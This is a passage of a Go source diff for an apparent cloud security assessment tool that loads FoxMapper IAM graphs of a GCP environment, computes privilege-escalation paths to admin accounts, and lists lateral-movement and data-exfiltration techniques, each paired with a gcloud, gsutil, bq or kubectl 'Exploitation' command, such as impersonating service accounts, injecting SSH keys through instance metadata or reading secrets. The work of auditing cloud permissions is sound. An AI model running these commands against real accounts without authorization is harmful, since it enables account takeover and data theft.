"nodes.json") + if _, err := os.Stat(nodesPath); err == nil { + graphPath = path + break + } + } + + if graphPath == "" { + return fmt.Errorf("no FoxMapper data found for %s. Run 'foxmapper gcp graph create' first", identifier) + } + + return s.LoadGraphFromPath(graphPath) +} + +// LoadGraphFromPath loads FoxMapper graph from a specific path +func (s *FoxMapperService) LoadGraphFromPath(path string) error { + graphDir := filepath.Join(path, "graph") + + // Load nodes + nodesPath := filepath.Join(graphDir, "nodes.json") + nodesData, err := os.ReadFile(nodesPath) + if err != nil { + return fmt.Errorf("failed to read nodes.json: %w", err) + } + if err := json.Unmarshal(nodesData, &s.Nodes); err != nil { + return fmt.Errorf("failed to parse nodes.json: %w", err) + } + + // Build node map + for i := range s.Nodes { + s.nodeMap[s.Nodes[i].MemberID] = &s.Nodes[i] + // Also map by email for convenience + if s.Nodes[i].Email != "" { + s.nodeMap[s.Nodes[i].Email] = &s.Nodes[i] + } + } + + // Load edges + edgesPath := filepath.Join(graphDir, "edges.json") + edgesData, err := os.ReadFile(edgesPath) + if err != nil { + return fmt.Errorf("failed to read edges.json: %w", err) + } + if err := json.Unmarshal(edgesData, &s.Edges); err != nil { + return fmt.Errorf("failed to parse edges.json: %w", err) + } + + // Load policies (optional) + policiesPath := filepath.Join(graphDir, "policies.json") + if policiesData, err := os.ReadFile(policiesPath); err == nil { + json.Unmarshal(policiesData, &s.Policies) + } + + // Load metadata (optional) + metadataPath := filepath.Join(path, "metadata.json") + if metadataData, err := os.ReadFile(metadataPath); err == nil { + json.Unmarshal(metadataData, &s.Metadata) + } + + // Load pre-computed lateral movement findings (optional) + lateralPath := filepath.Join(graphDir, "lateral_findings.json") + if lateralData, err := os.ReadFile(lateralPath); err == nil { + var lateralFindings LateralFindingsFile + if json.Unmarshal(lateralData, &lateralFindings) == nil { + s.LateralFindingsData = &lateralFindings + } + } + + // Load pre-computed data exfil findings (optional) + dataExfilPath := filepath.Join(graphDir, "data_exfil_findings.json") + if dataExfilData, err := os.ReadFile(dataExfilPath); err == nil { + var dataExfilFindings DataExfilFindingsFile + if json.Unmarshal(dataExfilData, &dataExfilFindings) == nil { + s.DataExfilFindingsData = &dataExfilFindings + } + } + + // Build graph for path finding + s.buildGraph() + + // Compute path to admin for all nodes + s.computePathsToAdmin() + + s.initialized = true + return nil +} + +// MergeGraphFromPath merges another graph into this service +// Used to combine multiple project graphs into a single view +func (s *FoxMapperService) MergeGraphFromPath(path string) error { + graphDir := filepath.Join(path, "graph") + + // Load nodes from the other graph + nodesPath := filepath.Join(graphDir, "nodes.json") + nodesData, err := os.ReadFile(nodesPath) + if err != nil { + return fmt.Errorf("failed to read nodes.json: %w", err) + } + var otherNodes []Node + if err := json.Unmarshal(nodesData, &otherNodes); err != nil { + return fmt.Errorf("failed to parse nodes.json: %w", err) + } + + // Load edges from the other graph + edgesPath := filepath.Join(graphDir, "edges.json") + edgesData, err := os.ReadFile(edgesPath) + if err != nil { + return fmt.Errorf("failed to read edges.json: %w", err) + } + var otherEdges []Edge + if err := json.Unmarshal(edgesData, &otherEdges); err != nil { + return fmt.Errorf("failed to parse edges.json: %w", err) + } + + // Merge nodes (avoid duplicates by member_id) + existingNodes := make(map[string]bool) + for _, node := range s.Nodes { + existingNodes[node.MemberID] = true + } + for _, node := range otherNodes { + if !existingNodes[node.MemberID] { + s.Nodes = append(s.Nodes, node) + s.nodeMap[node.MemberID] = &s.Nodes[len(s.Nodes)-1] + if node.Email != "" { + s.nodeMap[node.Email] = &s.Nodes[len(s.Nodes)-1] + } + existingNodes[node.MemberID] = true + } + } + + // Merge edges (avoid duplicates by source+destination+short_reason) + type edgeKey struct { + source, dest, reason string + } + existingEdges := make(map[edgeKey]bool) + for _, edge := range s.Edges { + existingEdges[edgeKey{edge.Source, edge.Destination, edge.ShortReason}] = true + } + for _, edge := range otherEdges { + key := edgeKey{edge.Source, edge.Destination, edge.ShortReason} + if !existingEdges[key] { + s.Edges = append(s.Edges, edge) + existingEdges[key] = true + } + } + + // Load and merge policies (optional) + policiesPath := filepath.Join(graphDir, "policies.json") + if policiesData, err := os.ReadFile(policiesPath); err == nil { + var otherPolicies []Policy + if json.Unmarshal(policiesData, &otherPolicies) == nil { + // Simple append for policies - could dedupe by resource if needed + s.Policies = append(s.Policies, otherPolicies...) + } + } + + // Load and merge lateral findings (optional) + lateralPath := filepath.Join(graphDir, "lateral_findings.json") + if lateralData, err := os.ReadFile(lateralPath); err == nil { + var otherLateral LateralFindingsFile + if json.Unmarshal(lateralData, &otherLateral) == nil { + if s.LateralFindingsData == nil { + s.LateralFindingsData = &otherLateral + } else { + // Merge findings from both + s.LateralFindingsData.Findings = append(s.LateralFindingsData.Findings, otherLateral.Findings...) + s.LateralFindingsData.TechniquesWithAccess += otherLateral.TechniquesWithAccess + } + } + } + + // Load and merge data exfil findings (optional) + dataExfilPath := filepath.Join(graphDir, "data_exfil_findings.json") + if dataExfilData, err := os.ReadFile(dataExfilPath); err == nil { + var otherDataExfil DataExfilFindingsFile + if json.Unmarshal(dataExfilData, &otherDataExfil) == nil { + if s.DataExfilFindingsData == nil { + s.DataExfilFindingsData = &otherDataExfil + } else { + // Merge findings from both + s.DataExfilFindingsData.Findings = append(s.DataExfilFindingsData.Findings, otherDataExfil.Findings...) + s.DataExfilFindingsData.TechniquesWithAccess += otherDataExfil.TechniquesWithAccess + } + } + } + + return nil +} + +// RebuildAfterMerge rebuilds the in-memory graph and recomputes paths after merging +func (s *FoxMapperService) RebuildAfterMerge() { + s.buildGraph() + s.computePathsToAdmin() + s.initialized = true +} + +// buildGraph creates an in-memory graph for path finding +func (s *FoxMapperService) buildGraph() { + s.graph = graph.New(graph.StringHash, graph.Directed()) + + // Add all nodes as vertices + for _, node := range s.Nodes { + _ = s.graph.AddVertex(node.MemberID) + } + + // Add all edges + for _, edge := range s.Edges { + _ = s.graph.AddEdge( + edge.Source, + edge.Destination, + graph.EdgeAttribute("reason", edge.Reason), + graph.EdgeAttribute("short_reason", edge.ShortReason), + ) + } +} + +// computePathsToAdmin computes whether each node has a path to an admin node +func (s *FoxMapperService) computePathsToAdmin() { + adminNodes := s.GetAdminNodes() + + for i := range s.Nodes { + if s.Nodes[i].IsAdmin { + s.Nodes[i].PathToAdmin = true + s.Nodes[i].CanPrivEscToAdminString = "Admin" + s.Nodes[i].IsAdminString = "Yes" + } else { + hasPath := false + for _, admin := range adminNodes { + path, _ := graph.ShortestPath(s.graph, s.Nodes[i].MemberID, admin.MemberID) + if len(path) > 0 && s.Nodes[i].MemberID != admin.MemberID { + hasPath = true + break + } + } + s.Nodes[i].PathToAdmin = hasPath + if hasPath { + s.Nodes[i].CanPrivEscToAdminString = "Yes" + } else { + s.Nodes[i].CanPrivEscToAdminString = "No" + } + s.Nodes[i].IsAdminString = "No" + } + } +} + +// IsInitialized returns whether the graph has been loaded +func (s *FoxMapperService) IsInitialized() bool { + return s.initialized +} + +// GetNode returns a node by member_id or email +func (s *FoxMapperService) GetNode(identifier string) *Node { + // Try direct lookup + if node, ok := s.nodeMap[identifier]; ok { + return node + } + // Try with serviceAccount: prefix + if node, ok := s.nodeMap["serviceAccount:"+identifier]; ok { + return node + } + // Try with user: prefix + if node, ok := s.nodeMap["user:"+identifier]; ok { + return node + } + return nil +} + +// GetAdminNodes returns all admin nodes +func (s *FoxMapperService) GetAdminNodes() []*Node { + var admins []*Node + for i := range s.Nodes { + if s.Nodes[i].IsAdmin { + admins = append(admins, &s.Nodes[i]) + } + } + return admins +} + +// GetNodesWithPrivesc returns all nodes that can escalate to admin +func (s *FoxMapperService) GetNodesWithPrivesc() []*Node { + var nodes []*Node + for i := range s.Nodes { + if s.Nodes[i].PathToAdmin && !s.Nodes[i].IsAdmin { + nodes = append(nodes, &s.Nodes[i]) + } + } + return nodes +} + +// DoesPrincipalHavePathToAdmin checks if a principal can escalate to admin +func (s *FoxMapperService) DoesPrincipalHavePathToAdmin(principal string) bool { + node := s.GetNode(principal) + if node == nil { + return false + } + return node.PathToAdmin +} + +// IsPrincipalAdmin checks if a principal is an admin +func (s *FoxMapperService) IsPrincipalAdmin(principal string) bool { + node := s.GetNode(principal) + if node == nil { + return false + } + return node.IsAdmin +} + +// GetPrivescPaths returns all privesc paths for a principal +func (s *FoxMapperService) GetPrivescPaths(principal string) []PrivescPath { + node := s.GetNode(principal) + if node == nil { + return nil + } + + var paths []PrivescPath + adminNodes := s.GetAdminNodes() + + for _, admin := range adminNodes { + if node.MemberID == admin.MemberID { + continue + } + + shortestPath, _ := graph.ShortestPath(s.graph, node.MemberID, admin.MemberID) + if len(shortestPath) > 0 { + // Build edges for this path + var pathEdges []Edge + scopeBlocked := false + pathConfidence := "high" + for i := 0; i < len(shortestPath)-1; i++ { + edge := s.findEdge(shortestPath[i], shortestPath[i+1]) + if edge != nil { + pathEdges = append(pathEdges, *edge) + if edge.ScopeBlocksEscalation { + scopeBlocked = true + } + pathConfidence = WorstConfidence(pathConfidence, edge.EffectiveConfidence()) + } + } + + paths = append(paths, PrivescPath{ + Source: node.Email, + Destination: admin.Email, + Edges: pathEdges, + HopCount: len(pathEdges), + AdminLevel: admin.AdminLevel, + ScopeBlocked: scopeBlocked, + Confidence: pathConfidence, + }) + } + } + + // Sort by hop count + sort.Slice(paths, func(i, j int) bool { + return paths[i].HopCount < paths[j].HopCount + }) + + return paths +} + +// findEdge finds an edge between two nodes +func (s *FoxMapperService) findEdge(source, dest string) *Edge { + for i := range s.Edges { + if s.Edges[i].Source == source && s.Edges[i].Destination == dest { + return &s.Edges[i] + } + } + return nil +} + +// GetAttackSummary returns a summary string like "Privesc/Exfil/Lateral" for a principal +// This is used by other modules to display attack path info +func (s *FoxMapperService) GetAttackSummary(principal string) string { + if !s.initialized { + return "No FoxMapper data" + } + + node := s.GetNode(principal) + if node == nil { + return "Unknown" + } + + if node.IsAdmin { + adminLevel := node.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + return fmt.Sprintf("Admin (%s)", adminLevel) + } + + if node.PathToAdmin { + paths := s.GetPrivescPaths(principal) + if len(paths) > 0 { + // Find the highest admin level reachable and best confidence + highestLevel := "project" + shortestHops := paths[0].HopCount + bestConfidence := paths[0].Confidence + for _, p := range paths { + if p.AdminLevel == "org" { + highestLevel = "org" + } else if p.AdminLevel == "folder" && highestLevel != "org" { + highestLevel = "folder" + } + } + if bestConfidence != "" && bestConfidence != "high" { + return fmt.Sprintf("Privesc->%s (%d hops, %s confidence)", highestLevel, shortestHops, bestConfidence) + } + return fmt.Sprintf("Privesc->%s (%d hops)", highestLevel, shortestHops) + } + return "Privesc" + } + + return "No" +} + +// GetPrivescSummary returns a summary of all privesc paths in the graph +func (s *FoxMapperService) GetPrivescSummary() map[string]interface{} { + totalNodes := len(s.Nodes) + adminNodes := len(s.GetAdminNodes()) + nodesWithPrivesc := len(s.GetNodesWithPrivesc()) + + // Count by admin level + orgAdmins := 0 + folderAdmins := 0 + projectAdmins := 0 + for _, node := range s.Nodes { + if node.IsAdmin { + switch node.AdminLevel { + case "org": + orgAdmins++ + case "folder": + folderAdmins++ + case "project": + projectAdmins++ + default: + projectAdmins++ + } + } + } + + // Count by principal type + saWithPrivesc := 0 + userWithPrivesc := 0 + for _, node := range s.GetNodesWithPrivesc() { + if node.MemberType == "serviceAccount" { + saWithPrivesc++ + } else if node.MemberType == "user" { + userWithPrivesc++ + } + } + + return map[string]interface{}{ + "total_nodes": totalNodes, + "admin_nodes": adminNodes, + "non_admin_nodes": totalNodes - adminNodes, + "nodes_with_privesc": nodesWithPrivesc, + "org_admins": orgAdmins, + "folder_admins": folderAdmins, + "project_admins": projectAdmins, + "sa_with_privesc": saWithPrivesc, + "user_with_privesc": userWithPrivesc, + "percent_with_privesc": func() float64 { + if totalNodes-adminNodes == 0 { + return 0 + } + return float64(nodesWithPrivesc) / float64(totalNodes-adminNodes) * 100 + }(), + } +} + +// FormatPrivescPath formats a privesc path for display +func FormatPrivescPath(path PrivescPath) string { + var sb strings.Builder + confidenceInfo := "" + if path.Confidence != "" && path.Confidence != "high" { + confidenceInfo = fmt.Sprintf(", %s confidence", path.Confidence) + } + sb.WriteString(fmt.Sprintf("%s -> %s (%d hops%s)\n", path.Source, path.Destination, path.HopCount, confidenceInfo)) + for i, edge := range path.Edges { + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, annotations)) + } + return sb.String() +} + +// GetEdgesFrom returns all edges from a given node +func (s *FoxMapperService) GetEdgesFrom(principal string) []Edge { + var edges []Edge + node := s.GetNode(principal) + if node == nil { + return edges + } + + for _, edge := range s.Edges { + if edge.Source == node.MemberID { + edges = append(edges, edge) + } + } + return edges +} + +// GetEdgesTo returns all edges to a given node +func (s *FoxMapperService) GetEdgesTo(principal string) []Edge { + var edges []Edge + node := s.GetNode(principal) + if node == nil { + return edges + } + + for _, edge := range s.Edges { + if edge.Destination == node.MemberID { + edges = append(edges, edge) + } + } + return edges +} + +// FindFoxMapperData searches for FoxMapper data and returns the path if found +func FindFoxMapperData(identifier string, isOrg bool) (string, error) { + paths := generateFoxMapperDataBasePaths(identifier, isOrg) + + for _, path := range paths { + graphDir := filepath.Join(path, "graph") + nodesPath := filepath.Join(graphDir, "nodes.json") + if _, err := os.Stat(nodesPath); err == nil { + return path, nil + } + } + + return "", fmt.Errorf("no FoxMapper data found for %s", identifier) +} + +// GetServiceAccountNodes returns all service account nodes +func (s *FoxMapperService) GetServiceAccountNodes() []*Node { + var nodes []*Node + for i := range s.Nodes { + if s.Nodes[i].MemberType == "serviceAccount" { + nodes = append(nodes, &s.Nodes[i]) + } + } + return nodes +} + +// ========================================== +// FoxMapper Preset Execution Support +// ========================================== + +// PresetResult represents the result of running a FoxMapper preset +type PresetResult struct { + Preset string `json:"preset"` + ProjectID string `json:"project_id"` + TotalFindings int `json:"total_findings"` + Findings []PresetFinding `json:"findings"` + Summary map[string]interface{} `json:"summary"` + CategoriesSummary map[string]CategoryInfo `json:"categories_summary"` +} + +// PresetFinding represents a single finding from a preset +type PresetFinding struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Category string `json:"category"` + Service string `json:"service,omitempty"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + PrincipalCount int `json:"principal_count"` + NonAdminCount int `json:"non_admin_count"` + ViaEdgeCount int `json:"via_edge_count,omitempty"` + Principals []PrincipalAccess `json:"principals"` + Resources []string `json:"resources_with_access,omitempty"` +} + +// PrincipalAccess represents a principal with access to a technique +type PrincipalAccess struct { + Principal string `json:"principal"` + MemberID string `json:"member_id"` + MemberType string `json:"member_type"` + IsAdmin bool `json:"is_admin"` + IsServiceAccount bool `json:"is_service_account"` + AccessType string `json:"access_type"` // project_iam, resource_iam, via_privesc + ViaEdge bool `json:"via_edge"` + EdgePath []string `json:"edge_path,omitempty"` + HasCondition bool `json:"has_condition"` + // Scope information - WHERE the permission was granted + ScopeType string `json:"scope_type,omitempty"` // organization, folder, project + ScopeID string `json:"scope_id,omitempty"` // The org/folder/project ID + ScopeName string `json:"scope_name,omitempty"` // Display name if available +} + +// CategoryInfo provides summary info for a category +type CategoryInfo struct { + Count int `json:"count"` + Description string `json:"description"` +} + +// PrivescFinding represents a privilege escalation finding +type PrivescFinding struct { + Principal string `json:"principal"` + MemberType string `json:"member_type"` + IsAdmin bool `json:"is_admin"` + CanEscalate bool `json:"can_escalate"` + HighestAdminLevel string `json:"highest_admin_level"` // org, folder, project + HighestReachableTarget string `json:"highest_reachable_target"` // The admin principal that can be reached + HighestReachableProject string `json:"highest_reachable_project"` // The project of the highest reachable admin + ViablePathCount int `json:"viable_path_count"` + ScopeBlockedCount int `json:"scope_blocked_count"` + PathsToOrgAdmin int `json:"paths_to_org_admin"` + PathsToFolderAdmin int `json:"paths_to_folder_admin"` + PathsToProjectAdmin int `json:"paths_to_project_admin"` + ShortestPathHops int `json:"shortest_path_hops"` + BestPathConfidence string `json:"best_path_confidence,omitempty"` // confidence of best path (high, medium, low) + Paths []PrivescPath `json:"paths,omitempty"` +} + +// AnalyzePrivesc analyzes privilege escalation using graph data +// This is equivalent to running "foxmapper gcp query preset privesc" +func (s *FoxMapperService) AnalyzePrivesc() []PrivescFinding { + if !s.initialized { + return nil + } + + var findings []PrivescFinding + + for i := range s.Nodes { + node := &s.Nodes[i] + + finding := PrivescFinding{ + Principal: node.Email, + MemberType: node.MemberType, + IsAdmin: node.IsAdmin, + } + + if node.IsAdmin { + finding.HighestAdminLevel = node.AdminLevel + if finding.HighestAdminLevel == "" { + finding.HighestAdminLevel = "project" + } + // For admins, they are their own "target" + finding.HighestReachableTarget = node.Email + finding.HighestReachableProject = node.ProjectID + } else if node.PathToAdmin { + finding.CanEscalate = true + paths := s.GetPrivescPaths(node.MemberID) + finding.Paths = paths + + // Track the best path (highest level, shortest hops) + var bestPath *PrivescPath + + // Analyze paths + for idx := range paths { + path := &paths[idx] + if path.ScopeBlocked { + finding.ScopeBlockedCount++ + } else { + finding.ViablePathCount++ + } + + // Track admin level and update best path + switch path.AdminLevel { + case "org": + finding.PathsToOrgAdmin++ + if finding.HighestAdminLevel != "org" { + finding.HighestAdminLevel = "org" + bestPath = path + } else if bestPath != nil && path.HopCount < bestPath.HopCount { + bestPath = path + } + case "folder": + finding.PathsToFolderAdmin++ + if finding.HighestAdminLevel == "" || finding.HighestAdminLevel == "project" { + finding.HighestAdminLevel = "folder" + bestPath = path + } else if finding.HighestAdminLevel == "folder" && (bestPath == nil || path.HopCount < bestPath.HopCount) { + bestPath = path + } + case "project": + finding.PathsToProjectAdmin++ + if finding.HighestAdminLevel == "" { + finding.HighestAdminLevel = "project" + bestPath = path + } else if finding.HighestAdminLevel == "project" && (bestPath == nil || path.HopCount < bestPath.HopCount) { + bestPath = path + } + } + + // Track shortest path + if finding.ShortestPathHops == 0 || path.HopCount < finding.ShortestPathHops { + finding.ShortestPathHops = path.HopCount + } + } + + // Set the highest reachable target info + if bestPath != nil { + finding.HighestReachableTarget = bestPath.Destination + finding.BestPathConfidence = bestPath.Confidence + // Try to get project info from the destination node + destNode := s.GetNode(bestPath.Destination) + if destNode != nil { + finding.HighestReachableProject = destNode.ProjectID + } + } + } + + // Only include principals with privesc potential or admins + if finding.IsAdmin || finding.CanEscalate { + findings = append(findings, finding) + } + } + + return findings +} + +// LateralFinding represents a lateral movement technique finding +type LateralFinding struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Category string `json:"category"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + Principals []PrincipalAccess `json:"principals"` +} + +// LateralTechnique defines a lateral movement technique +type LateralTechnique struct { + Permission string + Description string + Exploitation string + Category string +} + +// GetLateralTechniques returns all lateral movement techniques +func GetLateralTechniques() map[string]LateralTechnique { + return map[string]LateralTechnique{ + // Service Account Impersonation + "sa_token_creator": { + Permission: "iam.serviceAccounts.getAccessToken", + Description: "Can get access tokens for service accounts", + Exploitation: "gcloud auth print-access-token --impersonate-service-account=SA_EMAIL", + Category: "sa_impersonation", + }, + "sa_key_creator": { + Permission: "iam.serviceAccountKeys.create", + Description: "Can create keys for service accounts", + Exploitation: "gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL", + Category: "sa_impersonation", + }, + "sa_sign_blob": { + Permission: "iam.serviceAccounts.signBlob", + Description: "Can sign blobs as service account", + Exploitation: "gcloud iam service-accounts sign-blob --iam-account=SA_EMAIL input.txt output.txt", + Category: "sa_impersonation", + }, + "sa_sign_jwt": { + Permission: "iam.serviceAccounts.signJwt", + Description: "Can sign JWTs as service account", + Exploitation: "# Sign JWT to impersonate SA", + Category: "sa_impersonation", + }, + "sa_openid_token": { + Permission: "iam.serviceAccounts.getOpenIdToken", + Description: "Can get OpenID tokens for service accounts", + Exploitation: "gcloud auth print-identity-token --impersonate-service-account=SA_EMAIL", + Category: "sa_impersonation", + }, + // Compute Access + "compute_ssh_oslogin": { + Permission: "compute.instances.osLogin", + Description: "Can SSH to compute instances via OS Login", + Exploitation: "gcloud compute ssh INSTANCE_NAME --zone=ZONE", + Category: "compute_access", + }, + "compute_set_metadata": { + Permission: "compute.instances.setMetadata", + Description: "Can inject SSH keys via instance metadata", + Exploitation: "gcloud compute instances add-metadata INSTANCE --metadata=ssh-keys=\"user:SSH_KEY\"", + Category: "compute_access", + }, + "compute_set_project_metadata": { + Permission: "compute.projects.setCommonInstanceMetadata", + Description: "Can inject SSH keys via project metadata", + Exploitation: "gcloud compute project-info add-metadata --metadata=ssh-keys=\"user:SSH_KEY\"", + Category: "compute_access", + }, + "compute_serial_port": { + Permission: "compute.instances.getSerialPortOutput", + Description: "Can read serial port output (may leak data)", + Exploitation: "gcloud compute instances get-serial-port-output INSTANCE --zone=ZONE", + Category: "compute_access", + }, + // GKE Access + "gke_get_credentials": { + Permission: "container.clusters.getCredentials", + Description: "Can get GKE cluster credentials", + Exploitation: "gcloud container clusters get-credentials CLUSTER --zone=ZONE", + Category: "gke_access", + }, + "gke_pod_exec": { + Permission: "container.pods.exec", + Description: "Can exec into GKE pods", + Exploitation: "kubectl exec -it POD -- /bin/sh", + Category: "gke_access", + }, + "gke_pod_attach": { + Permission: "container.pods.attach", + Description: "Can attach to GKE pods", + Exploitation: "kubectl attach -it POD", + Category: "gke_access", + }, + // Cloud Functions + "functions_create": { + Permission: "cloudfunctions.functions.create", + Description: "Can create Cloud Functions with any SA", + Exploitation: "gcloud functions deploy FUNC --runtime=python311 --service-account=SA_EMAIL", + Category: "serverless", + }, + "functions_update": { + Permission: "cloudfunctions.functions.update", + Description: "Can update Cloud Functions to change SA or code", + Exploitation: "gcloud functions deploy FUNC --service-account=SA_EMAIL", + Category: "serverless", + }, + // Cloud Run + "run_create": { + Permission: "run.services.create", + Description: "Can create Cloud Run services with any SA", + Exploitation: "gcloud run deploy SERVICE --image=IMAGE --service-account=SA_EMAIL", + Category: "serverless", + }, + "run_update": { + Permission: "run.services.update", + Description: "Can update Cloud Run services to change SA", + Exploitation: "gcloud run services update SERVICE --service-account=SA_EMAIL", + Category: "serverless", + }, + // Secrets + "secret_access": { + Permission: "secretmanager.versions.access", + Description: "Can access secret values", + Exploitation: "gcloud secrets versions access latest --secret=SECRET_NAME", + Category: "secrets", + }, + } +} + +// AnalyzeLateral analyzes lateral movement opportunities using graph data +// This is equivalent to running "foxmapper gcp query preset lateral" +// If pre-computed findings exist (lateral_findings.json), uses those. +// Otherwise falls back to edge-based analysis. +func (s *FoxMapperService) AnalyzeLateral(category string) []LateralFinding { + if !s.initialized { + return nil + } + + // Use pre-computed findings from FoxMapper if available + if s.LateralFindingsData != nil && len(s.LateralFindingsData.Findings) > 0 { + return s.analyzeLateralFromFindings(category) + } + + // Fallback to edge-based analysis (legacy behavior) + return s.analyzeLateralFromEdges(category) +} + +// analyzeLateralFromFindings uses pre-computed findings from lateral_findings.json +func (s *FoxMapperService) analyzeLateralFromFindings(category string) []LateralFinding { + var findings []LateralFinding + + // Get the project ID from the findings data for project-level scope derivation + projectID := s.LateralFindingsData.ProjectID + + for _, f := range s.LateralFindingsData.Findings { + // Filter by category if specified + if category != "" && f.Category != category { + continue + } + + // Convert file format to internal format + var principals []PrincipalAccess + for _, p := range f.Principals { + // Get scope info from JSON fields, Resource, or derive from access_type + scopeType := p.ScopeType + scopeID := p.ScopeID + scopeName := p.ScopeName + + if scopeType == "" { + if p.Resource != "" { + // Resource field exists in JSON + scopeType, scopeID, scopeName = s.parseResourceScope(p.Resource) + } else { + // Derive scope from access_type and available context + scopeType, scopeID, scopeName = s.deriveScopeFromContext(p.MemberID, p.AccessType, p.ViaEdge, projectID) + } + } + + principals = append(principals, PrincipalAccess{ + Principal: p.Principal, + MemberID: p.MemberID, + MemberType: p.MemberType, + IsAdmin: p.IsAdmin, + IsServiceAccount: p.IsServiceAccount, + AccessType: p.AccessType, + ViaEdge: p.ViaEdge, + EdgePath: p.EdgePath, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + }) + } + + if len(principals) > 0 { + findings = append(findings, LateralFinding{ + Technique: f.Technique, + Permission: f.Permission, + Category: f.Category, + Description: f.Description, + Exploitation: f.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// analyzeLateralFromEdges is the legacy edge-based analysis (fallback) +func (s *FoxMapperService) analyzeLateralFromEdges(category string) []LateralFinding { + var findings []LateralFinding + techniques := GetLateralTechniques() + + for name, tech := range techniques { + // Filter by category if specified + if category != "" && tech.Category != category { + continue + } + + // Find principals with this permission via edges + var principals []PrincipalAccess + for _, edge := range s.Edges { + // Check if edge grants this permission + if strings.Contains(strings.ToLower(edge.Reason), strings.ToLower(tech.Permission)) || + strings.Contains(edge.ShortReason, tech.Permission) { + node := s.GetNode(edge.Source) + if node != nil { + scopeType, scopeID, scopeName := s.parseResourceScope(edge.Resource) + principals = append(principals, PrincipalAccess{ + Principal: node.Email, + MemberID: node.MemberID, + MemberType: node.MemberType, + IsAdmin: node.IsAdmin, + IsServiceAccount: node.MemberType == "serviceAccount", + AccessType: "via_privesc", + ViaEdge: true, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + }) + } + } + } + + if len(principals) > 0 { + findings = append(findings, LateralFinding{ + Technique: name, + Permission: tech.Permission, + Category: tech.Category, + Description: tech.Description, + Exploitation: tech.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// DataExfilTechnique defines a data exfiltration technique +type DataExfilTechnique struct { + Permission string + Description string + Exploitation string + Service string +} + +// GetDataExfilTechniques returns all data exfiltration techniques +func GetDataExfilTechniques() map[string]DataExfilTechnique { + return map[string]DataExfilTechnique{ + // Storage + "gcs_objects_get": { + Permission: "storage.objects.get", + Description: "Can download objects from GCS buckets", + Exploitation: "gsutil cp gs://BUCKET/path/to/file ./local/", + Service: "storage", + }, + "gcs_objects_list": { + Permission: "storage.objects.list", + Description: "Can list objects in GCS buckets", + Exploitation: "gsutil ls -r gs://BUCKET/", + Service: "storage", + }, + // BigQuery + "bq_data_get": { + Permission: "bigquery.tables.getData", + Description: "Can read BigQuery table data", + Exploitation: "bq query 'SELECT * FROM dataset.table'", + Service: "bigquery", + }, + "bq_tables_export": { + Permission: "bigquery.tables.export", + Description: "Can export BigQuery tables to GCS", + Exploitation: "bq extract dataset.table gs://BUCKET/export.csv", + Service: "bigquery", + }, + // Cloud SQL + "cloudsql_export": { + Permission: "cloudsql.instances.export", + Description: "Can export Cloud SQL databases", + Exploitation: "gcloud sql export sql INSTANCE gs://BUCKET/export.sql --database=DB", + Service: "cloudsql", + }, + "cloudsql_connect": { + Permission: "cloudsql.instances.connect", + Description: "Can connect to Cloud SQL instances", + Exploitation: "gcloud sql connect INSTANCE --user=root", + Service: "cloudsql", + }, + // Secrets + "secrets_access": { + Permission: "secretmanager.versions.access", + Description: "Can access secret values", + Exploitation: "gcloud secrets versions access latest --secret=SECRET", + Service: "secretmanager", + }, + // KMS + "kms_decrypt": { + Permission: "cloudkms.cryptoKeyVersions.useToDecrypt", + Description: "Can decrypt data using KMS keys", + Exploitation: "gcloud kms decrypt --key=KEY --keyring=KEYRING --location=LOCATION --ciphertext-file=encrypted.bin --plaintext-file=decrypted.txt", + Service: "kms", + }, + // Logging + "logging_read": { + Permission: "logging.logEntries.list", + Description: "Can read log entries (may contain sensitive data)", + Exploitation: "gcloud logging read 'logName=\"projects/PROJECT/logs/LOG\"'", + Service: "logging", + }, + // Pub/Sub + "pubsub_receive": { + Permission: "pubsub.subscriptions.consume", + Description: "Can receive messages from Pub/Sub subscriptions", + Exploitation: "gcloud pubsub subscriptions pull SUBSCRIPTION --auto-ack", + Service: "pubsub", + }, + // Compute disk snapshots + "snapshot_useReadOnly": { + Permission: "compute.snapshots.useReadOnly", + Description: "Can use disk snapshots to create disks", + Exploitation: "gcloud compute disks create DISK --source-snapshot=SNAPSHOT", + Service: "compute", + }, + } +} + +// DataExfilFinding represents a data exfiltration finding +type DataExfilFinding struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Service string `json:"service"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + Principals []PrincipalAccess `json:"principals"` +} + +// AnalyzeDataExfil analyzes data exfiltration opportunities using graph data +// This is equivalent to running "foxmapper gcp query preset data-exfil" +// If pre-computed findings exist (data_exfil_findings.json), uses those. +// Otherwise falls back to edge-based analysis. +func (s *FoxMapperService) AnalyzeDataExfil(service string) []DataExfilFinding { + if !s.initialized { + return nil + } + + // Use pre-computed findings from FoxMapper if available + if s.DataExfilFindingsData != nil && len(s.DataExfilFindingsData.Findings) > 0 { + return s.analyzeDataExfilFromFindings(service) + } + + // Fallback to edge-based analysis (legacy behavior) + return s.analyzeDataExfilFromEdges(service) +} + +// analyzeDataExfilFromFindings uses pre-computed findings from data_exfil_findings.json +func (s *FoxMapperService) analyzeDataExfilFromFindings(service string) []DataExfilFinding { + var findings []DataExfilFinding + + // Get the project ID from the findings data for project-level scope derivation + projectID := s.DataExfilFindingsData.ProjectID + + for _, f := range s.DataExfilFindingsData.Findings { + // Filter by service if specified + if service != "" && f.Service != service { + continue + } + + // Convert file format to internal format + var principals []PrincipalAccess + for _, p := range f.Principals { + // Get scope info from JSON fields, Resource, or derive from access_type + scopeType := p.ScopeType + scopeID := p.ScopeID + scopeName := p.ScopeName + + if scopeType == "" { + if p.Resource != "" { + // Resource field exists in JSON + scopeType, scopeID, scopeName = s.parseResourceScope(p.Resource) + } else { + // Derive scope from access_type and available context + scopeType, scopeID, scopeName = s.deriveScopeFromContext(p.MemberID, 